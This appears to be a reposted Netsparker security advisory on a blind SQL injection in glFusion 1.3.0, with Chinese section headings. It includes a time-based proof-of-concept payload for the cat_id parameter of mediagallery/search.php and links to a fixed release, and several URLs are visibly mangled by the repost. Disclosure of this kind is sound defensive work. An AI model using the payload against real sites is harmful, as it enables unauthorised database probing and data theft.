信息 -------------------- 名称: SQL Injection Vulnerability in glFusion 软件 : glFusion 1.3.0 and possibly below. 主页 : http://HdhCmsTestglfusion.org 缺陷类型 : Blind SQL Injection 研究者 : Omar Kurt 概述 -------------------- A dynamic system based on flexible and granular permissions, with spam protection, forums, file management, media gallery, calendars, polls, site-wide search, RSS feeds, and more! 技术摘要 -------------------- glFusion is affected by SQL Injection vulnerability in version 1.3.0. Example PoC url is as follows: Blind SQL Injection Vulnerability http://example测试数据/mediagallery/search.php POST - param: cat_id='+(SELECT 1 FROM (SELECT SLEEP(25))A)+' You can read the full article about SQL Injection vulnerabilities from here : http://HdhCmsTestmavitunasecurity测试数据/sql-injection/ 解决方案 -------------------- http://HdhCmsTestglfusion.org/article.php/glfusion131 Netsparker Advisories, <advisories@mavitunasecurity测试数据> Homepage, http://HdhCmsTestmavitunasecurity测试数据/netsparker-advisories/
查看更多关于glFusion 1.3.0 (search.php页面cat_id参数) SQL注射 - 网站的详细内容...